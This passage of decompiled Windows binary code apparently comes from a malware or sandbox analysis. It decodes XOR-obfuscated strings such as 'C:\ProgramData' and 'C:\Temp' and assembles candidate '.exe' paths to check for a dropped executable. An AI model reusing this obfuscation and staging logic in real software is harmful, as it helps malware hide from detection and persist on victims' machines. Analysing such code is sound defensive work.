									_v28 = 3;
									_t1162 = E0040C910( &_v440, _t1161,  &_v384);
									_t1854 = _t1845 + 8;
									E004024A0(_t1409,  &_v408, _t1162);
									_t1732 = _v420;
									__eflags = _t1732 - 0x10;
									if(_t1732 < 0x10) {
										L45:
										_v28 = 2;
										_t1733 = _v468;
										_v424 = 0;
										_v420 = 0xf;
										_v440 = 0;
										__eflags = _t1733 - 0x10;
										if(_t1733 < 0x10) {
											L49:
											_t1885 = _t1854 - 0x18;
											_v412 = _t1885;
											E0040BB10(_t1409, _t1885, _t1733, _t1808,  &_v360);
											_t1886 = _t1885 - 0x18;
											_v28 = 4;
											_t1572 = _t1886;
											E0040BB10(_t1409, _t1572, _t1733, _t1808,  &_v408);
											_v28 = 2;
											_t1168 = E00406800(_t1409, _t1572, _t1808, _t1815); // executed
											_t1887 = _t1886 + 0x30;
											__eflags = _t1168;
											if(_t1168 == 0) {
												_v413 = 0x2e;
												_t1808 =  *( *[fs:0x2c]);
												_t1170 =  *0x450efc; // 0x0
												__eflags = _t1170 -  *((intOrPtr*)(_t1808 + 4));
												if(_t1170 >  *((intOrPtr*)(_t1808 + 4))) {
													E0040EEC8(_t1170, 0x450efc);
													_t1887 = _t1887 + 4;
													__eflags =  *0x450efc - 0xffffffff;
													if(__eflags == 0) {
														asm("movaps xmm0, [0x439d70]");
														asm("movups [0x450ea8], xmm0");
														 *0x450eb8 = _v413;
														E0040F1DA(_t1572, __eflags, 0x42d000);
														E0040EE7E(0x450efc);
														_t1887 = _t1887 + 8;
													}
												}
												_t1171 =  *0x450eb8; // 0x0
												__eflags = _t1171;
												if(_t1171 != 0) {
													asm("movups xmm0, [0x450ea8]");
													asm("movaps xmm1, [0x439d20]");
													asm("pxor xmm1, xmm0");
													 *0x450eb8 = _t1171 ^ 0x0000002e;
													asm("movups [0x450ea8], xmm1");
												}
												_t1573 = 0x450ea8;
												_v336 = 0;
												_v320 = 0;
												_v316 = 0xf;
												_v336 = 0;
												_t158 = _t1573 + 1; // 0x450ea9
												_t1734 = _t158;
												asm("o16 nop [eax+eax]");
												do {
													_t1172 =  *_t1573;
													_t1573 = _t1573 + 1;
													__eflags = _t1172;
												} while (_t1172 != 0);
												E004026C0(_t1409,  &_v336, 0x450ea8, _t1573 - _t1734);
												_v28 = 7;
												_t1735 = _v316;
												_t1576 = _v320;
												__eflags = _t1735 - _t1576 - 1;
												if(_t1735 - _t1576 < 1) {
													_v412 = 0;
													_t1176 = E00402990(_t1409,  &_v336, _t1808, _t1815, 1, _v412, "\\", 1);
												} else {
													_t163 = _t1576 + 1; // 0x1
													__eflags = _t1735 - 0x10;
													_v320 = _t163;
													_t1345 =  >=  ? _v336 :  &_v336;
													 *((short*)(( >=  ? _v336 :  &_v336) + _t1576)) = 0x5c;
													_t1176 =  &_v336;
												}
												_v464 = 0;
												_v448 = 0;
												_v444 = 0;
												asm("movups xmm0, [eax]");
												asm("movups [ebp-0x1b8], xmm0");
												asm("movq xmm0, [eax+0x10]");
												asm("movq [ebp-0x1a8], xmm0");
												 *(_t1176 + 0x10) = 0;
												 *(_t1176 + 0x14) = 0xf;
												 *_t1176 = 0;
												_v28 = 8;
												_t1178 = E0040C910( &_v440,  &_v464,  &_v384);
												_t1854 = _t1887 + 4;
												E004024A0(_t1409,  &_v408, _t1178);
												_t1737 = _v420;
												__eflags = _t1737 - 0x10;
												if(_t1737 < 0x10) {
													L90:
													_v28 = 7;
													_t1738 = _v444;
													_v424 = 0;
													_v420 = 0xf;
													_v440 = 0;
													__eflags = _t1738 - 0x10;
													if(_t1738 < 0x10) {
														L94:
														_v28 = 2;
														_t1739 = _v316;
														_v448 = 0;
														_v444 = 0xf;
														_v464 = 0;
														__eflags = _t1739 - 0x10;
														if(_t1739 < 0x10) {
															L98:
															_t1888 = _t1854 - 0x18;
															_v316 = _t1888;
															E0040BB10(_t1409, _t1888, _t1739, _t1808,  &_v360);
															_t1889 = _t1888 - 0x18;
															_v28 = 9;
															_t1581 = _t1889;
															E0040BB10(_t1409, _t1581, _t1739, _t1808,  &_v408);
															_v28 = 2;
															_t1184 = E00406800(_t1409, _t1581, _t1808, _t1815);
															_t1890 = _t1889 + 0x30;
															__eflags = _t1184;
															if(_t1184 == 0) {
																_t1185 =  *0x450e88; // 0x0
																_v328 = 0x7e72146d;
																_v324 = 0x5c49415c;
																_v320 = 0x4f6a434f;
																_v316 = 0x4f5a;
																_v413 = 0x2e;
																__eflags = _t1185 -  *((intOrPtr*)(_t1808 + 4));
																if(_t1185 >  *((intOrPtr*)(_t1808 + 4))) {
																	E0040EEC8(_t1185, 0x450e88);
																	_t1890 = _t1890 + 4;
																	__eflags =  *0x450e88 - 0xffffffff;
																	if(__eflags == 0) {
																		asm("movq xmm0, [ebp-0x130]");
																		 *0x451010 = _v320;
																		 *0x451014 = _v316;
																		asm("movq [0x451008], xmm0");
																		 *0x451016 = _v413;
																		E0040F1DA(_t1581, __eflags, 0x42cfc0);
																		E0040EE7E(0x450e88);
																		_t1890 = _t1890 + 8;
																	}
																}
																__eflags =  *0x451016;
																if( *0x451016 != 0) {
																	_t1302 = 0;
																	__eflags = 0;
																	do {
																		 *(_t1302 + 0x451008) =  *(_t1302 + 0x451008) ^ 0x0000002e;
																		_t1302 = _t1302 + 1;
																		__eflags = _t1302 - 0xf;
																	} while (_t1302 < 0xf);
																}
																_t1582 = 0x451008;
																_v464 = 0;
																_v448 = 0;
																_v444 = 0xf;
																_v464 = 0;
																_t259 = _t1582 + 1; // 0x451009
																_t1740 = _t259;
																do {
																	_t1186 =  *_t1582;
																	_t1582 = _t1582 + 1;
																	__eflags = _t1186;
																} while (_t1186 != 0);
																E004026C0(_t1409,  &_v464, 0x451008, _t1582 - _t1740);
																_v28 = 0xc;
																_t1741 = _v444;
																_t1585 = _v448;
																__eflags = _t1741 - _t1585 - 1;
																if(_t1741 - _t1585 < 1) {
																	_v412 = 0;
																	_t1190 = E00402990(_t1409,  &_v464, _t1808, _t1815, 1, _v412, "\\", 1);
																} else {
																	_t264 = _t1585 + 1; // 0x1
																	__eflags = _t1741 - 0x10;
																	_v448 = _t264;
																	_t1301 =  >=  ? _v464 :  &_v464;
																	 *((short*)(( >=  ? _v464 :  &_v464) + _t1585)) = 0x5c;
																	_t1190 =  &_v464;
																}
																_v440 = 0;
																_v424 = 0;
																_v420 = 0;
																asm("movups xmm0, [eax]");
																asm("movups [ebp-0x1a0], xmm0");
																asm("movq xmm0, [eax+0x10]");
																asm("movq [ebp-0x190], xmm0");
																 *(_t1190 + 0x10) = 0;
																 *(_t1190 + 0x14) = 0xf;
																 *_t1190 = 0;
																_v28 = 0xd;
																_t1192 = E0040C910( &_v488,  &_v440,  &_v384);
																_t1854 = _t1890 + 4;
																E004024A0(_t1409,  &_v408, _t1192);
																_t1743 = _v468;
																__eflags = _t1743 - 0x10;
																if(_t1743 < 0x10) {
																	L135:
																	_v28 = 0xc;
																	_t1744 = _v420;
																	_v472 = 0;
																	_v468 = 0xf;
																	_v488 = 0;
																	__eflags = _t1744 - 0x10;
																	if(_t1744 < 0x10) {
																		L139:
																		_v28 = 2;
																		_t1745 = _v444;
																		_v424 = 0;
																		_v420 = 0xf;
																		_v440 = 0;
																		__eflags = _t1745 - 0x10;
																		if(_t1745 < 0x10) {
																			L143:
																			_t1891 = _t1854 - 0x18;
																			_v316 = _t1891;
																			E0040BB10(_t1409, _t1891, _t1745, _t1808,  &_v360);
																			_t1892 = _t1891 - 0x18;
																			_v28 = 0xe;
																			_t1590 = _t1892;
																			E0040BB10(_t1409, _t1590, _t1745, _t1808,  &_v408);
																			_v28 = 2;
																			_t1198 = E00406800(_t1409, _t1590, _t1808, _t1815);
																			_t1893 = _t1892 + 0x30;
																			__eflags = _t1198;
																			if(_t1198 == 0) {
																				_t1199 =  *0x450f14; // 0x0
																				_v320 = 0x7a72146d;
																				_v316 = 0x2e5e434b;
																				__eflags = _t1199 -  *((intOrPtr*)(_t1808 + 4));
																				if(_t1199 >  *((intOrPtr*)(_t1808 + 4))) {
																					E0040EEC8(_t1199, 0x450f14);
																					_t1893 = _t1893 + 4;
																					__eflags =  *0x450f14 - 0xffffffff;
																					if(__eflags == 0) {
																						 *0x450f38 = _v320;
																						 *0x450f3c = _v316;
																						E0040F1DA(_v316, __eflags, 0x42cfb0);
																						E0040EE7E(0x450f14);
																						_t1893 = _t1893 + 8;
																					}
																				}
																				_t1200 =  *0x450f3f; // 0x0
																				__eflags = _t1200;
																				if(_t1200 != 0) {
																					 *0x450f38 =  *0x450f38 ^ 0x0000002e;
																					 *0x450f39 =  *0x450f39 ^ 0x0000002e;
																					 *0x450f3a =  *0x450f3a ^ 0x0000002e;
																					 *0x450f3b =  *0x450f3b ^ 0x0000002e;
																					 *0x450f3c =  *0x450f3c ^ 0x0000002e;
																					 *0x450f3d =  *0x450f3d ^ 0x0000002e;
																					 *0x450f3e =  *0x450f3e ^ 0x0000002e;
																					_t1260 = _t1200 ^ 0x0000002e;
																					__eflags = _t1260;
																					 *0x450f3f = _t1260;
																				}
																				_t1591 = 0x450f38;
																				_v464 = 0;
																				_v448 = 0;
																				_v444 = 0xf;
																				_v464 = 0;
																				_t354 =  &(_t1591[1]); // 0x450f39
																				_t1746 = _t354;
																				do {
																					_t1201 =  *_t1591;
																					_t1591 =  &(_t1591[1]);
																					__eflags = _t1201;
																				} while (_t1201 != 0);
																				E004026C0(_t1409,  &_v464, 0x450f38, _t1591 - _t1746);
																				_v28 = 0x11;
																				_t1747 = _v444;
																				_t1594 = _v448;
																				__eflags = _t1747 - _t1594 - 1;
																				if(_t1747 - _t1594 < 1) {
																					_v412 = 0;
																					_t1205 = E00402990(_t1409,  &_v464, _t1808, _t1815, 1, _v412, "\\", 1);
																				} else {
																					_t359 = _t1594 + 1; // 0x1
																					__eflags = _t1747 - 0x10;
																					_v448 = _t359;
																					_t1259 =  >=  ? _v464 :  &_v464;
																					 *((short*)(( >=  ? _v464 :  &_v464) + _t1594)) = 0x5c;
																					_t1205 =  &_v464;
																				}
																				_v440 = 0;
																				_v424 = 0;
																				_v420 = 0;
																				asm("movups xmm0, [eax]");
																				asm("movups [ebp-0x1a0], xmm0");
																				asm("movq xmm0, [eax+0x10]");
																				asm("movq [ebp-0x190], xmm0");
																				 *(_t1205 + 0x10) = 0;
																				 *(_t1205 + 0x14) = 0xf;
																				 *_t1205 = 0;
																				_v28 = 0x12;
																				_t1207 = E0040C910( &_v488,  &_v440,  &_v384);
																				_t1854 = _t1893 + 4;
																				E004024A0(_t1409,  &_v408, _t1207);
																				_t1749 = _v468;
																				__eflags = _t1749 - 0x10;
																				if(_t1749 < 0x10) {
																					L179:
																					_v28 = 0x11;
																					_t1750 = _v420;
																					_v472 = 0;
																					_v468 = 0xf;
																					_v488 = 0;
																					__eflags = _t1750 - 0x10;
																					if(_t1750 < 0x10) {
																						L183:
																						_v28 = 2;
																						_t1751 = _v444;
																						_v424 = 0;
																						_v420 = 0xf;
																						_v440 = 0;
																						__eflags = _t1751 - 0x10;
																						if(_t1751 < 0x10) {
																							L187:
																							_t1894 = _t1854 - 0x18;
																							_v316 = _t1894;
																							E0040BB10(_t1409, _t1894, _t1751, _t1808,  &_v360);
																							_t1895 = _t1894 - 0x18;
																							_v28 = 0x13;
																							_t1599 = _t1895;
																							E0040BB10(_t1409, _t1599, _t1751, _t1808,  &_v408);
																							_v28 = 2;
																							_t1213 = E00406800(_t1409, _t1599, _t1808, _t1815);
																							_t1854 = _t1895 + 0x30;
																							__eflags = _t1213;
																							if(_t1213 == 0) {
																								_v28 = 1;
																								_t1752 = _v340;
																								__eflags = _t1752 - 0x10;
																								if(_t1752 < 0x10) {
																									L213:
																									_v28 = 0;
																									_t1677 = _v364;
																									_v344 = 0;
																									_v340 = 0xf;
																									_v360 = 0;
																									__eflags = _t1677 - 0x10;
																									if(_t1677 < 0x10) {
																										L342:
																										E00402520(_t1815, 0x4399f7);
																										L343:
																										E00402450(_t1409,  &_v408);
																										goto L344;
																									} else {
																										_t1600 = _v384;
																										_t1677 =  &(1[_t1677]);
																										_t1214 = _t1600;
																										__eflags = _t1677 - 0x1000;
																										if(_t1677 < 0x1000) {
																											L216:
																											_push(_t1677);
																											E0040ED7F(_t1600);
																											goto L342;
																										} else {
																											_t1467 =  *((intOrPtr*)(_t1600 - 4));
																											_t1677 = _t1677 + 0x23;
																											__eflags = _t1214 -  *((intOrPtr*)(_t1600 - 4)) + 0xfffffffc - 0x1f;
																											if(__eflags > 0) {
																												goto L346;
																											} else {
																												goto L216;
																											}
																										}
																									}
																								} else {
																									_t1601 = _v360;
																									_t1753 = _t1752 + 1;
																									_t1218 = _t1601;
																									__eflags = _t1753 - 0x1000;
																									if(_t1753 < 0x1000) {
																										L212:
																										_push(_t1753);
																										E0040ED7F(_t1601);
																										_t1854 = _t1854 + 8;
																										goto L213;
																									} else {
																										_t1467 =  *((intOrPtr*)(_t1601 - 4));
																										_t1677 = _t1753 + 0x23;
																										__eflags = _t1218 -  *((intOrPtr*)(_t1601 - 4)) + 0xfffffffc - 0x1f;
																										if(__eflags > 0) {
																											goto L346;
																										} else {
																											goto L212;
																										}
																									}
																								}
																							} else {
																								_push(_t1599);
																								_t1222 = E0040C6F0( &_v440,  &_v408);
																								_v28 = 0x14;
																								_t1223 = E0040C910( &_v488, _t1222,  &_v360);
																								_t1854 = _t1854 + 8;
																								_t1605 = _t1223;
																								_v28 = 0x15;
																								_t1808 =  *(_t1605 + 0x14);
																								_t1756 =  *(_t1605 + 0x10);
																								__eflags = _t1808 - _t1756 - 4;
																								if(_t1808 - _t1756 < 4) {
																									_v412 = 0;
																									_t1605 = E00402990(_t1409, _t1605, _t1808, _t1815, 4, _v412, ".exe", 4);
																								} else {
																									 *(_t1605 + 0x10) =  &(_t1756->lpSecurityDescriptor);
																									_t1244 = _t1605;
																									__eflags = _t1808 - 0x10;
																									if(_t1808 >= 0x10) {
																										_t1244 =  *_t1605;
																									}
																									 *((intOrPtr*)(_t1244 + _t1756)) = 0x6578652e;
																									 *((char*)(_t1244 +  &(_t1756->lpSecurityDescriptor))) = 0;
																								}
																								 *_t1815 = 0;
																								 *(_t1815 + 0x10) = 0;
																								 *(_t1815 + 0x14) = 0;
																								asm("movups xmm0, [ecx]");
																								asm("movups [esi], xmm0");
																								asm("movq xmm0, [ecx+0x10]");
																								asm("movq [esi+0x10], xmm0");
																								 *(_t1605 + 0x10) = 0;
																								 *(_t1605 + 0x14) = 0xf;
																								 *_t1605 = 0;
																								_t1757 = _v468;
																								__eflags = _t1757 - 0x10;
																								if(_t1757 < 0x10) {
																									L197:
																									_t1758 = _v420;
																									_v472 = 0;
																									_v468 = 0xf;
																									_v488 = 0;
																									__eflags = _t1758 - 0x10;
																									if(_t1758 < 0x10) {
																										L201:
																										_t1759 = _v340;
																										_v424 = 0;
																										_v420 = 0xf;
																										_v440 = 0;
																										__eflags = _t1759 - 0x10;
																										if(_t1759 < 0x10) {
																											L205:
																											_t1760 = _v364;
																											_v344 = 0;
																											_v340 = 0xf;
																											_v360 = 0;
																											__eflags = _t1760 - 0x10;
																											if(_t1760 < 0x10) {
																												goto L71;
																											} else {
																												_t1606 = _v384;
																												_t1761 = _t1760 + 1;
																												_t1227 = _t1606;
																												__eflags = _t1761 - 0x1000;
																												if(_t1761 < 0x1000) {
																													goto L70;
																												} else {
																													_t1467 =  *((intOrPtr*)(_t1606 - 4));
																													_t1677 = _t1761 + 0x23;
																													__eflags = _t1227 -  *((intOrPtr*)(_t1606 - 4)) + 0xfffffffc - 0x1f;
																													if(__eflags > 0) {
																														goto L346;
																													} else {
																														goto L70;
																													}
																												}
																											}
																										} else {
																											_t1607 = _v360;
																											_t1762 = _t1759 + 1;
																											_t1231 = _t1607;
																											__eflags = _t1762 - 0x1000;
																											if(_t1762 < 0x1000) {
																												L204:
																												_push(_t1762);
																												E0040ED7F(_t1607);
																												_t1854 = _t1854 + 8;
																												goto L205;
																											} else {
																												_t1467 =  *((intOrPtr*)(_t1607 - 4));
																												_t1677 = _t1762 + 0x23;
																												__eflags = _t1231 -  *((intOrPtr*)(_t1607 - 4)) + 0xfffffffc - 0x1f;
																												if(__eflags > 0) {
																													goto L346;
																												} else {
																													goto L204;
																												}
																											}
																										}
																									} else {
																										_t1608 = _v440;
																										_t1763 =  &(_t1758->nLength);
																										_t1235 = _t1608;
																										__eflags = _t1763 - 0x1000;
																										if(_t1763 < 0x1000) {
																											L200:
																											_push(_t1763);
																											E0040ED7F(_t1608);
																											_t1854 = _t1854 + 8;
																											goto L201;
																										} else {
																											_t1467 =  *((intOrPtr*)(_t1608 - 4));
																											_t1677 = _t1763 + 0x23;
																											__eflags = _t1235 -  *((intOrPtr*)(_t1608 - 4)) + 0xfffffffc - 0x1f;
																											if(__eflags > 0) {
																												goto L346;
																											} else {
																												goto L200;
																											}
																										}
																									}
																								} else {
																									_t1609 = _v488;
																									_t1764 = _t1757 + 1;
																									_t1239 = _t1609;
																									__eflags = _t1764 - 0x1000;
																									if(_t1764 < 0x1000) {
																										L196:
																										_push(_t1764);
																										E0040ED7F(_t1609);
																										_t1854 = _t1854 + 8;
																										goto L197;
																									} else {
																										_t1467 =  *((intOrPtr*)(_t1609 - 4));
																										_t1677 = _t1764 + 0x23;
																										__eflags = _t1239 -  *((intOrPtr*)(_t1609 - 4)) + 0xfffffffc - 0x1f;
																										if(__eflags > 0) {
																											goto L346;
																										} else {
																											goto L196;
																										}
																									}
																								}
																							}
																						} else {
																							_t1610 = _v464;
																							_t1751 =  &(_t1751->nLength);
																							_t1245 = _t1610;
																							__eflags = _t1751 - 0x1000;
																							if(_t1751 < 0x1000) {
																								L186:
																								_push(_t1751);
																								E0040ED7F(_t1610);
																								_t1854 = _t1854 + 8;
																								goto L187;
																							} else {
																								_t1467 =  *((intOrPtr*)(_t1610 - 4));
																								_t1677 = _t1751 + 0x23;
																								__eflags = _t1245 -  *((intOrPtr*)(_t1610 - 4)) + 0xfffffffc - 0x1f;
																								if(__eflags > 0) {
																									goto L346;
																								} else {
																									goto L186;
																								}
																							}
																						}
																					} else {
																						_t1611 = _v440;
																						_t1765 =  &(_t1750->nLength);
																						_t1249 = _t1611;
																						__eflags = _t1765 - 0x1000;
																						if(_t1765 < 0x1000) {
																							L182:
																							_push(_t1765);
																							E0040ED7F(_t1611);
																							_t1854 = _t1854 + 8;
																							goto L183;
																						} else {
																							_t1467 =  *((intOrPtr*)(_t1611 - 4));
																							_t1677 = _t1765 + 0x23;
																							__eflags = _t1249 -  *((intOrPtr*)(_t1611 - 4)) + 0xfffffffc - 0x1f;
																							if(__eflags > 0) {
																								goto L346;
																							} else {
																								goto L182;
																							}
																						}
																					}
																				} else {
																					_t1612 = _v488;
																					_t1766 = _t1749 + 1;
																					_t1253 = _t1612;
																					__eflags = _t1766 - 0x1000;
																					if(_t1766 < 0x1000) {
																						L178:
																						_push(_t1766);
																						E0040ED7F(_t1612);
																						_t1854 = _t1854 + 8;
																						goto L179;
																					} else {
																						_t1467 =  *((intOrPtr*)(_t1612 - 4));
																						_t1677 = _t1766 + 0x23;
																						__eflags = _t1253 -  *((intOrPtr*)(_t1612 - 4)) + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							goto L346;
																						} else {
																							goto L178;
																						}
																					}
																				}
																			} else {
																				_push(_t1590);
																				_t1265 = E0040C6F0( &_v440,  &_v408);
																				_v28 = 0xf;
																				_t1266 = E0040C910( &_v488, _t1265,  &_v360);
																				_t1854 = _t1893 + 8;
																				_t1617 = _t1266;
																				_v28 = 0x10;
																				_t1808 =  *(_t1617 + 0x14);
																				_t1769 =  *(_t1617 + 0x10);
																				__eflags = _t1808 - _t1769 - 4;
																				if(_t1808 - _t1769 < 4) {
																					_v412 = 0;
																					_t1617 = E00402990(_t1409, _t1617, _t1808, _t1815, 4, _v412, ".exe", 4);
																				} else {
																					 *(_t1617 + 0x10) =  &(_t1769->lpSecurityDescriptor);
																					_t1286 = _t1617;
																					__eflags = _t1808 - 0x10;
																					if(_t1808 >= 0x10) {
																						_t1286 =  *_t1617;
																					}
																					 *((intOrPtr*)(_t1286 + _t1769)) = 0x6578652e;
																					 *((char*)(_t1286 +  &(_t1769->lpSecurityDescriptor))) = 0;
																				}
																				 *_t1815 = 0;
																				 *(_t1815 + 0x10) = 0;
																				 *(_t1815 + 0x14) = 0;
																				asm("movups xmm0, [ecx]");
																				asm("movups [esi], xmm0");
																				asm("movq xmm0, [ecx+0x10]");
																				asm("movq [esi+0x10], xmm0");
																				 *(_t1617 + 0x10) = 0;
																				 *(_t1617 + 0x14) = 0xf;
																				 *_t1617 = 0;
																				_t1770 = _v468;
																				__eflags = _t1770 - 0x10;
																				if(_t1770 < 0x10) {
																					L153:
																					_t1771 = _v420;
																					_v472 = 0;
																					_v468 = 0xf;
																					_v488 = 0;
																					__eflags = _t1771 - 0x10;
																					if(_t1771 < 0x10) {
																						L157:
																						_t1772 = _v340;
																						_v424 = 0;
																						_v420 = 0xf;
																						_v440 = 0;
																						__eflags = _t1772 - 0x10;
																						if(_t1772 < 0x10) {
																							L161:
																							_t1773 = _v364;
																							_v344 = 0;
																							_v340 = 0xf;
																							_v360 = 0;
																							__eflags = _t1773 - 0x10;
																							if(_t1773 < 0x10) {
																								goto L71;
																							} else {
																								_t1606 = _v384;
																								_t1761 = _t1773 + 1;
																								_t1270 = _t1606;
																								__eflags = _t1761 - 0x1000;
																								if(_t1761 < 0x1000) {
																									goto L70;
																								} else {
																									_t1467 =  *((intOrPtr*)(_t1606 - 4));
																									_t1677 = _t1761 + 0x23;
																									__eflags = _t1270 -  *((intOrPtr*)(_t1606 - 4)) + 0xfffffffc - 0x1f;
																									if(__eflags > 0) {
																										goto L346;
																									} else {
																										goto L70;
																									}
																								}
																							}
																						} else {
																							_t1618 = _v360;
																							_t1774 = _t1772 + 1;
																							_t1273 = _t1618;
																							__eflags = _t1774 - 0x1000;
																							if(_t1774 < 0x1000) {
																								L160:
																								_push(_t1774);
																								E0040ED7F(_t1618);
																								_t1854 = _t1854 + 8;
																								goto L161;
																							} else {
																								_t1467 =  *((intOrPtr*)(_t1618 - 4));
																								_t1677 = _t1774 + 0x23;
																								__eflags = _t1273 -  *((intOrPtr*)(_t1618 - 4)) + 0xfffffffc - 0x1f;
																								if(__eflags > 0) {
																									goto L346;
																								} else {
																									goto L160;
																								}
																							}
																						}
																					} else {
																						_t1619 = _v440;
																						_t1775 =  &(_t1771->nLength);
																						_t1277 = _t1619;
																						__eflags = _t1775 - 0x1000;
																						if(_t1775 < 0x1000) {
																							L156:
																							_push(_t1775);
																							E0040ED7F(_t1619);
																							_t1854 = _t1854 + 8;
																							goto L157;
																						} else {
																							_t1467 =  *((intOrPtr*)(_t1619 - 4));
																							_t1677 = _t1775 + 0x23;
																							__eflags = _t1277 -  *((intOrPtr*)(_t1619 - 4)) + 0xfffffffc - 0x1f;
																							if(__eflags > 0) {
																								goto L346;
																							} else {
																								goto L156;
																							}
																						}
																					}
																				} else {
																					_t1620 = _v488;
																					_t1776 = _t1770 + 1;
																					_t1281 = _t1620;
																					__eflags = _t1776 - 0x1000;
																					if(_t1776 < 0x1000) {
																						L152:
																						_push(_t1776);
																						E0040ED7F(_t1620);
																						_t1854 = _t1854 + 8;
																						goto L153;
																					} else {
																						_t1467 =  *((intOrPtr*)(_t1620 - 4));
																						_t1677 = _t1776 + 0x23;
																						__eflags = _t1281 -  *((intOrPtr*)(_t1620 - 4)) + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							goto L346;
																						} else {
																							goto L152;
																						}
																					}
																				}
																			}
																		} else {
																			_t1621 = _v464;
																			_t1745 =  &(_t1745->nLength);
																			_t1287 = _t1621;
																			__eflags = _t1745 - 0x1000;
																			if(_t1745 < 0x1000) {
																				L142:
																				_push(_t1745);
																				E0040ED7F(_t1621);
																				_t1854 = _t1854 + 8;
																				goto L143;
																			} else {
																				_t1467 =  *((intOrPtr*)(_t1621 - 4));
																				_t1677 = _t1745 + 0x23;
																				__eflags = _t1287 -  *((intOrPtr*)(_t1621 - 4)) + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					goto L346;
																				} else {
																					goto L142;
																				}
																			}
																		}
																	} else {
																		_t1622 = _v440;
																		_t1777 =  &(_t1744->nLength);
																		_t1291 = _t1622;
																		__eflags = _t1777 - 0x1000;
																		if(_t1777 < 0x1000) {
																			L138:
																			_push(_t1777);
																			E0040ED7F(_t1622);
																			_t1854 = _t1854 + 8;
																			goto L139;
																		} else {
																			_t1467 =  *((intOrPtr*)(_t1622 - 4));
																			_t1677 = _t1777 + 0x23;
																			__eflags = _t1291 -  *((intOrPtr*)(_t1622 - 4)) + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L346;
																			} else {
																				goto L138;
																			}
																		}
																	}
																} else {
																	_t1623 = _v488;
																	_t1778 = _t1743 + 1;
																	_t1295 = _t1623;
																	__eflags = _t1778 - 0x1000;
																	if(_t1778 < 0x1000) {
																		L134:
																		_push(_t1778);
																		E0040ED7F(_t1623);
																		_t1854 = _t1854 + 8;
																		goto L135;
																	} else {
																		_t1467 =  *((intOrPtr*)(_t1623 - 4));
																		_t1677 = _t1778 + 0x23;
																		__eflags = _t1295 -  *((intOrPtr*)(_t1623 - 4)) + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L346;
																		} else {
																			goto L134;
																		}
																	}
																}
															} else {
																_push(_t1581);
																_t1309 = E0040C6F0( &_v464,  &_v408);
																_v28 = 0xa;
																_t1310 = E0040C910( &_v440, _t1309,  &_v360);
																_t1854 = _t1890 + 8;
																_t1627 = _t1310;
																_v28 = 0xb;
																_t1808 =  *(_t1627 + 0x14);
																_t1781 =  *(_t1627 + 0x10);
																__eflags = _t1808 - _t1781 - 4;
																if(_t1808 - _t1781 < 4) {
																	_v412 = 0;
																	_t1627 = E00402990(_t1409, _t1627, _t1808, _t1815, 4, _v412, ".exe", 4);
																} else {
																	 *(_t1627 + 0x10) =  &(_t1781->lpSecurityDescriptor);
																	_t1330 = _t1627;
																	__eflags = _t1808 - 0x10;
																	if(_t1808 >= 0x10) {
																		_t1330 =  *_t1627;
																	}
																	 *((intOrPtr*)(_t1330 + _t1781)) = 0x6578652e;
																	 *((char*)(_t1330 +  &(_t1781->lpSecurityDescriptor))) = 0;
																}
																 *_t1815 = 0;
																 *(_t1815 + 0x10) = 0;
																 *(_t1815 + 0x14) = 0;
																asm("movups xmm0, [ecx]");
																asm("movups [esi], xmm0");
																asm("movq xmm0, [ecx+0x10]");
																asm("movq [esi+0x10], xmm0");
																 *(_t1627 + 0x10) = 0;
																 *(_t1627 + 0x14) = 0xf;
																 *_t1627 = 0;
																_t1782 = _v420;
																__eflags = _t1782 - 0x10;
																if(_t1782 < 0x10) {
																	L108:
																	_t1783 = _v444;
																	_v424 = 0;
																	_v420 = 0xf;
																	_v440 = 0;
																	__eflags = _t1783 - 0x10;
																	if(_t1783 < 0x10) {
																		L112:
																		_t1784 = _v340;
																		_v448 = 0;
																		_v444 = 0xf;
																		_v464 = 0;
																		__eflags = _t1784 - 0x10;
																		if(_t1784 < 0x10) {
																			L116:
																			_t1785 = _v364;
																			_v344 = 0;
																			_v340 = 0xf;
																			_v360 = 0;
																			__eflags = _t1785 - 0x10;
																			if(_t1785 < 0x10) {
																				goto L71;
																			} else {
																				_t1606 = _v384;
																				_t1761 = _t1785 + 1;
																				_t1314 = _t1606;
																				__eflags = _t1761 - 0x1000;
																				if(_t1761 < 0x1000) {
																					goto L70;
																				} else {
																					_t1467 =  *((intOrPtr*)(_t1606 - 4));
																					_t1677 = _t1761 + 0x23;
																					__eflags = _t1314 -  *((intOrPtr*)(_t1606 - 4)) + 0xfffffffc - 0x1f;
																					if(__eflags > 0) {
																						goto L346;
																					} else {
																						goto L70;
																					}
																				}
																			}
																		} else {
																			_t1628 = _v360;
																			_t1786 = _t1784 + 1;
																			_t1317 = _t1628;
																			__eflags = _t1786 - 0x1000;
																			if(_t1786 < 0x1000) {
																				L115:
																				_push(_t1786);
																				E0040ED7F(_t1628);
																				_t1854 = _t1854 + 8;
																				goto L116;
																			} else {
																				_t1467 =  *((intOrPtr*)(_t1628 - 4));
																				_t1677 = _t1786 + 0x23;
																				__eflags = _t1317 -  *((intOrPtr*)(_t1628 - 4)) + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					goto L346;
																				} else {
																					goto L115;
																				}
																			}
																		}
																	} else {
																		_t1629 = _v464;
																		_t1787 =  &(_t1783->nLength);
																		_t1321 = _t1629;
																		__eflags = _t1787 - 0x1000;
																		if(_t1787 < 0x1000) {
																			L111:
																			_push(_t1787);
																			E0040ED7F(_t1629);
																			_t1854 = _t1854 + 8;
																			goto L112;
																		} else {
																			_t1467 =  *((intOrPtr*)(_t1629 - 4));
																			_t1677 = _t1787 + 0x23;
																			__eflags = _t1321 -  *((intOrPtr*)(_t1629 - 4)) + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L346;
																			} else {
																				goto L111;
																			}
																		}
																	}
																} else {
																	_t1630 = _v440;
																	_t1788 =  &(_t1782->nLength);
																	_t1325 = _t1630;
																	__eflags = _t1788 - 0x1000;
																	if(_t1788 < 0x1000) {
																		L107:
																		_push(_t1788);
																		E0040ED7F(_t1630);
																		_t1854 = _t1854 + 8;
																		goto L108;
																	} else {
																		_t1467 =  *((intOrPtr*)(_t1630 - 4));
																		_t1677 = _t1788 + 0x23;
																		__eflags = _t1325 -  *((intOrPtr*)(_t1630 - 4)) + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L346;
																		} else {
																			goto L107;
																		}
																	}
																}
															}
														} else {
															_t1631 = _v336;
